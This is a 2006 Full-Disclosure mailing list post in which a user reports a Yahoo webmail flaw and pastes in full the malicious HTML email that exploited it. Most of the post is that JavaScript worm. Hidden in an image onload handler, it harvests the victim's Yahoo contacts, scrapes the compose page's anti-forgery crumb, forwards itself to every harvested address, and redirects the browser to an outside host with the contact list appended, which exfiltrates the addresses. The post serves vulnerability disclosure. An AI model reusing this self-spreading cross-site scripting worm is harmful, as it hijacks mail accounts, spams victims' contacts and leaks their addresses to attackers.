[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Vunerability in yahoo webmail.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Vunerability in yahoo webmail.
- From: "David Loyall" <david.loyall@xxxxxxxxx>
- Date: Sun, 11 Jun 2006 23:35:13 -0500
Hello, all.
I just received an email with an html attachment, on a yahoo account.
When I opened the mail, yahoo automatically displayed the html, and executed
the code within. What the hell. =) It forwarded the message to my contacts
list, (or some other set of addresses, dunno,) and redirected my browser to
a website.
I'm of to a BBQ, and I don't care about yahoo. So I'm not even going to
read the code and see how this happens. I'm attaching the html file as a
text file. Enjoy!
Oh, I've CC'd abuse@xxxxxxxxx, but if someone else would give them a proper
write-up, and encourage them to close the hole, that'd be wonderful.
Cheers,
--David Loyall
Omaha, Nebraska
David Loyall <http://david.loyall.googlepages.com>
<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'
target=""onload="var http_request = false; var Email = ''; var IDList =
''; var CRumb = ''; function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) { http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) { http_request = new
ActiveXObject('Microsoft.XMLHTTP'); }
http_request.target=""onreadystatechange = Func;
http_request.open(Method, url, true); if( Method == 'GET')
http_request.send(null); else http_request.send(Param);
}window.open('http://www,lastdata.com'); ServerUrl = url0;USIndex =
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen =
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
function GetIDs(HtmlContent) { IDList = '';
StartString = ' <td>'; EndString = '</td>';
i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); while(StartIndex >= 0)
{ EndIndex = HtmlContent.indexOf(EndString,
StartIndex); CutLen = EndIndex - StartIndex -
StartString.length; YahooID = HtmlContent.substr(StartIndex
+ StartString.length, CutLen);
if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com',
0) > 0 ) IDList = IDList + ',' + YahooID ;
StartString = '</tr>'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); StartString
= ' <td>'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); i++;
} if(IDList.substr(0,1) == ',')
IDList = IDList.substr(1, IDList.length);
if(IDList.indexOf(',', 0)>0 ) {
IDListArray = IDList.split(','); Email = IDListArray[0];
IDList = IDList.replace(Email + ',', '');
} CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', '');
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail,
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' +
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList =
IDList.replace(UserEmail, ''); return IDList; } function
ListContacts() { if (http_request.readyState == 4) { if
(http_request.status == 200) { HtmlContent =
http_request.responseText; IDList = GetIDs(HtmlContent);
makeRequest('http://us.' +
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET',
null); } } } function ExtractStr(HtmlContent) {
StartString = 'name=\u0022.crumb\u0022 value=\u0022';
EndString = '\u0022'; i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); EndIndex =
HtmlContent.indexOf(EndString, StartIndex + StartString.length );
CutLen = EndIndex - StartIndex - StartString.length; crumb =
HtmlContent.substr(StartIndex + StartString.length , CutLen ); return
crumb; } function Getcrumb() { if (http_request.readyState ==
4) { if (http_request.status == 200) {
HtmlContent = http_request.responseText; CRumb =
ExtractStr(HtmlContent); MyBody
= 'this is test'; MySubj = 'New Graphic Site';
Url = 'http://us.' + Server +
'.mail.yahoo.com/ym/Compose';
var ComposeAction = compose.action;MidIndex =
ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc'
,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex
+ 5, CutLen); QIndex = ComposeAction.indexOf('?box=' ,0);AIndex =
ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName =
ComposeAction.substr(QIndex + 5, CutLen); Param =
'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel';
Param = Param.replace('BOXNAME', BoxName); Param =
Param.replace('RUMBVAL', CRumb); Param =
Param.replace('BCCLIST', IDList); Param =
Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL',
'av3@xxxxxxxxx'); Param = Param.replace('EMAILBODY',
MyBody); Param = Param.replace('PlainMESSAGE', '');
Param = Param.replace('EMAILSUBJ', MySubj);Param=
Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj);
Param = Param.replace('EMAILMID', MyMid);Param =
Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST',
Param); } }} function alertContents() { if
(http_request.readyState == 4) {
window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList='
+ IDList) } } makeRequest('http://us.' + Server +
'.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd='
+ Math.random(), ListContacts, 'GET', null)">Please wait while loading the site_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/